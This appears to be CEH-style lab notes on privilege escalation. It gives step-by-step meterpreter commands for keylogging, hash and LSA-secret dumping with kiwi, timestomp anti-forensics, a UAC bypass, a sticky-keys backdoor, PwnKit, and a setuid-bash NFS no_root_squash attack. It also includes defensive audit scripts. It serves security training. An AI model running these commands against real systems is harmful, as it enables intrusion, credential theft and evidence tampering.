# 2. Privilege Escalation

## <mark style="color:red;">1. Escalate privileges using Priv Esc tools</mark>

After you have a meterpreter session, use the following command to check the user.

```
getuid
```

We can use the **BeRoot** tool to check for further attack vectors.

{% embed url="https://github.com/AlessandroZ/BeRoot" %}

Upload it through meterpreter. The file lands in the session's current working directory, which in this lab is usually the user's Downloads folder.

```
upload beroot.exe
```

Now drop into a command shell with `shell` and execute the file. It lists the possible escalation vectors.

<figure><img src="/files/zG4U3hacCrhPGn3wUsmR" alt=""><figcaption></figcaption></figure>

Note: certain Windows privileges can be abused to escalate privileges. These include SeDebug, SeRestore and SeBackup, SeTakeOwnership, SeTcb and SeCreateToken, SeLoadDriver, and SeImpersonate and SeAssignPrimaryToken. BeRoot lists the privileges held by the current token and highlights any of these.

**Ghostpack Seatbelt**

{% embed url="https://github.com/GhostPack/Seatbelt" %}

Gather information with the following commands:

```
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc
```

### Dumping hashes in meterpreter

```
hashdump
# if hashdump fails (it needs a SYSTEM token), try the post module instead
run post/windows/gather/smart_hashdump
```

## <mark style="color:red;">2. Post exploitation using Meterpreter</mark>

Useful commands

```
sysinfo          # OS, architecture and hostname of the target
getuid           # user the session is running as
ifconfig         # network interfaces of the target
pwd              # current directory (usually the Downloads folder in this lab)
ls
cat <file>
cd <dir>
keyscan_start    # start the keylogger
keyscan_dump     # print the captured keystrokes
keyscan_stop
idletime         # seconds since the user last touched the machine
```

To modify the MACE timestamps (Modified, Accessed, Created, Entry modified in the MFT) of a file. timestomp expects dates as `MM/DD/YYYY HH24:MI:SS`:

```
timestomp secret.ext -m "2/11/2022 8:10:03"
```

To view timestamp entries

```
timestomp secret.ext -v
```

{% hint style="info" %}
-a accessed

-c created

-e entry modified
{% endhint %}

### Finding files in meterpreter

`search -f flag*.txt (in meterpreter)`

### Hidden files in shell

First get the shell, then use the following command.

```
dir /a:h
```

### List all running services in shell

```
sc queryex type= service state= all
```

### Other shell commands

```
netsh firewall show state                      # firewall state (legacy "netsh firewall" context)
netsh firewall show config
wmic cpu get                                   # CPU details
wmic /node:"" product get name,version,vendor  # installed software; the computer name goes between the quotes
wmic useraccount get name,sid                  # local accounts and their SIDs
wmic os where Primary='TRUE' reboot            # restarts the system
```

<figure><img src="/files/3ZhLhK3rmCRHiZZHnhUa" alt=""><figcaption></figcaption></figure>

{% embed url="https://rumble.com/embed/v6nqhxc/?pub=4jw86f" %}
Linux Privilege Escalation CEH labs complete walkthrough
{% endembed %}

## <mark style="color:red;">3. Linux privilege escalation with pkexec</mark>

**CVE-2021-4034 (PwnKit)**

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes, and its `pkexec` command runs another command as a different user (root by default). CVE-2021-4034 (PwnKit) is a memory-corruption bug in pkexec's argument handling that lets any local user obtain root on an unpatched system.

{% embed url="https://github.com/berdav/CVE-2021-4034" %}

Get the repository onto the target, build it with `make` and run the resulting binary; on a vulnerable pkexec you are dropped into a root shell. Patched distribution builds of polkit are not affected, even when they still report an old version string, so a failed run usually means the target has been patched.

## <mark style="color:red;">4. Linux priv esc with NFS misconfiguration</mark>

{% embed url="https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/" %}
An excellent tutorial
{% endembed %}

### Configure NFS in Victim

```
sudo apt install nfs-kernel-server
```

Open the `/etc/exports` file. It lists the directories exported over NFS and the clients and options for each. Add the following entry.

```
/home    *(rw,no_root_squash)
```

{% hint style="info" %}
`/home` is exported read/write to every host (`*`). `no_root_squash` turns off the default mapping of a remote root user to `nobody`, so files created by root on a client keep root ownership on the server. That combination is the misconfiguration exploited below.
{% endhint %}

Restart the NFS server so the new export takes effect.

```
sudo /etc/init.d/nfs-kernel-server restart
# on a systemd host: sudo systemctl restart nfs-kernel-server
```

If we run an nmap scan now, port 2049 (nfs) shows as open.

<figure><img src="/files/R32op6FqSxXU1gSoLWsf" alt=""><figcaption></figcaption></figure>

### In Attacking Machine

Now install the NFS client utilities.

```
sudo apt install nfs-common
```

List the shares the victim exports.

```
showmount -e 192.168.18.110
```

Now mount the share.

```
mkdir /tmp/nfs
sudo mount -t nfs 192.168.18.110:/home /tmp/nfs
```

Now move into the mounted share, copy bash in as root and set the setuid bit. Because of `no_root_squash`, the copy is owned by root on the server too.

```
cd /tmp/nfs
sudo cp /bin/bash .
sudo chmod +s bash   # sets the setuid (and setgid) bit; it does not grant group execute rights
ls -la bash          # expect -rwsr-sr-x ... root root
```

To confirm the share is mounted (and where):

```
df -h /tmp/nfs
```

<figure><img src="/files/Kl9HKd4BEG2gZARv7D1h" alt=""><figcaption></figcaption></figure>

Now SSH into the victim as the low-privileged user, move to the shared directory and run the copied bash. The `-p` flag makes bash keep the effective UID granted by the setuid bit instead of dropping it, so we get a root shell.

```
cd /home
./bash -p
```
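The export line added on the victim is exactly what an administrator should be scanning for. The following is an added example (not from this page or the linked tutorial): a POSIX shell audit of an `exports(5)` file that flags entries combining `rw` with `no_root_squash`, the pairing that lets root on a client plant a root-owned setuid binary as above. The sample exports file it runs against is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): audit an exports(5) file for the
# NFS misconfiguration used above. An export that is rw AND no_root_squash lets
# root on any allowed client write a root-owned setuid file into the share,
# which a low-privileged user on the server can then execute.
# The sample exports file at the bottom is constructed for this demo.

# has_opt OPTS NAME: succeed if NAME appears in the comma-separated list OPTS.
has_opt() {
  case ",$1," in
    *",$2,"*) return 0 ;;
  esac
  return 1
}

# audit_exports FILE: print one finding per risky export entry.
# Exit status 1 if any CRITICAL (rw + no_root_squash) entry was found, else 0.
audit_exports() {
  critical=0
  while read -r path clients; do
    # skip blank lines and comments
    case "$path" in ""|\#*) continue ;; esac
    # each export may list several "host(opts)" entries
    for client in $clients; do
      host=${client%%\(*}
      case "$client" in
        *\(*) opts=${client#*\(}; opts=${opts%\)} ;;
        *)    opts="" ;;          # bare host: kernel defaults are ro,root_squash
      esac
      [ -n "$host" ] || host='*'  # "(rw)" with no host applies to every client
      if has_opt "$opts" rw && has_opt "$opts" no_root_squash; then
        printf 'CRITICAL %s is rw,no_root_squash for %s: client root can plant a setuid binary\n' "$path" "$host"
        critical=1
      elif has_opt "$opts" no_root_squash; then
        printf 'WARN %s is no_root_squash (read-only) for %s\n' "$path" "$host"
      elif has_opt "$opts" rw && [ "$host" = '*' ]; then
        printf 'WARN %s is writable by every host (root_squash still applies)\n' "$path"
      fi
    done
  done < "$1"
  return "$critical"
}

# --- demo on a constructed exports file ---
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample; the /home line is the entry added on the victim above
/home        *(rw,no_root_squash)
/srv/backup  192.168.18.0/24(ro,no_root_squash)
/srv/pub     *(ro,root_squash)
/srv/data    192.168.18.20(rw,root_squash,sync)
EOF

if audit_exports "$sample"; then
  echo "no critical exports"
else
  echo "fix: drop no_root_squash (root_squash is the default) or restrict the host list"
fi
rm -f "$sample"
```

Run it against the real file with `audit_exports /etc/exports` on the server. Read-only `no_root_squash` and world-writable `root_squash` exports are only warnings: the first cannot be written to, and in the second a client root user is mapped to `nobody`, so neither allows a root-owned setuid file to be created.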

Useful commands post exploitation:

```
id
whoami
cat /etc/crontab; ls -la /etc/cron.d      # scheduled jobs
find / -name "*.txt" -ls 2>/dev/null      # list all text files on the system
route -n                                  # routing table with numeric addresses instead of host/network names
```

The same trick works with other binaries. From the attacking machine copy nano into the share and set its setuid bit, then on the victim use it to read the shadow file (the `-p` flag belongs to bash, not nano).

```
sudo cp /bin/nano .
sudo chmod +s nano
./nano /etc/shadow
```

To see running processes

```
ps -ef
```

To find setuid binaries (the `-4000` permission bit) anywhere on the system:

```
find / -perm -4000 -type f -ls 2>/dev/null
```
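Listing setuid files is more useful when compared against what the system is supposed to have. The following is an added example (not from the original page): shell functions that enumerate setuid/setgid files under a tree and report those missing from a baseline list, which is how a planted root-owned `bash` like the one above stands out. The directory tree and baseline that `demo_tree` builds are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate setuid/setgid files
# under a directory tree and report those missing from a baseline, so a planted
# root-owned "bash" like the one above stands out. demo_tree builds a
# constructed tree and baseline for this demo; on a real host run
# list_suid / and keep a baseline taken from a known-good install.

# list_suid ROOT: sorted list of regular files under ROOT with setuid or setgid set.
list_suid() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# new_suid ROOT BASELINE: setuid/setgid files under ROOT not listed in BASELINE
# (one absolute path per line). comm(1) is used so an empty baseline reports everything.
new_suid() {
  sorted=$(mktemp)
  sort "$2" > "$sorted"
  list_suid "$1" | comm -23 - "$sorted"
  rm -f "$sorted"
}

# demo_tree: build a constructed tree plus baseline and print the tree root.
#   bin/passwd      setuid, present in the baseline (expected)
#   home/bash       setuid, NOT in the baseline (the planted shell)
#   home/notes.txt  plain file, never reported
demo_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/bin" "$root/home"
  : > "$root/bin/passwd";    chmod 4755 "$root/bin/passwd"
  : > "$root/home/bash";     chmod 4755 "$root/home/bash"
  : > "$root/home/notes.txt"
  printf '%s\n' "$root/bin/passwd" > "$root/baseline.txt"
  echo "$root"
}

# --- demo ---
root=$(demo_tree)
echo "all setuid/setgid files:"; list_suid "$root"
echo "not in baseline:";         new_suid "$root" "$root/baseline.txt"
rm -rf "$root"
```

On a real host the baseline is the output of `list_suid /` taken right after installation; anything `new_suid` reports later, such as a copy of bash or nano sitting in a home directory, deserves a look.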

## <mark style="color:red;">5. Escalate privileges bypassing UAC and with sticky keys</mark>

After you have a meterpreter session, background it and use the following exploit. Note that a UAC bypass only helps when the current user is already a member of the local Administrators group running at medium integrity; it does not turn a standard user into an administrator.

```
use exploit/windows/local/bypassuac_fodhelper
set SESSION <session-id>
run
```

Once the new, high-integrity meterpreter session arrives, escalate to SYSTEM with:

```
getsystem -t 1   # technique 1: named-pipe impersonation
```

To list the current sessions and switch between them:

```
sessions -l        # list all sessions
sessions -i <id>   # interact with one of them
```

**Using sticky keys to priv esc on Win 11**

The module needs an elevated session, so run it after the UAC bypass and `getsystem` above. Background that session and use the following module.

```
use post/windows/manage/sticky_keys
set SESSION <elevated-session-id>
run
```

It writes an Image File Execution Options debugger entry so that Windows launches cmd.exe in place of the Sticky Keys helper (sethc.exe).

Now on the Windows 11 machine, sign in as a normal user, lock the screen (or stay at the sign-in screen) and press Shift five times. Instead of the Sticky Keys prompt a cmd.exe opens in the context of the sign-in screen, which runs as SYSTEM.

## <mark style="color:red;">6. Priv esc using Mimikatz</mark>

Metasploit has a built-in meterpreter extension for Mimikatz called kiwi.

First get a meterpreter session and escalate it with the UAC bypass and `getsystem`: kiwi's credential dumping needs a SYSTEM token, and the meterpreter process architecture must match the OS (use an x64 session on 64-bit Windows, migrating if necessary).

In meterpreter load the extension:

```
load kiwi
help kiwi   # lists the kiwi commands
```

<figure><img src="/files/zaDDtG04acLswohvTjnK" alt=""><figcaption></figcaption></figure>

To dump the local SAM hashes:

```
lsa_dump_sam
```

We can also dump LSA secrets with `lsa_dump_secrets`. LSA secrets are credentials the Local Security Authority stores in the registry under `HKLM\SECURITY\Policy\Secrets`; they may include service-account passwords, auto-logon credentials and application passwords such as stored SQL credentials.

Kiwi can also change a user's password. With `-n` you supply the account's current NTLM hash instead of the plaintext, so the original password need not be known.

```
password_change -u raj -p 123 -P 9876           # current password known
password_change -u raj -n <NTLM-hash> -P 1234   # only the current NTLM hash known
```

### CEH v13 Practical Course

{% embed url="https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C" %}


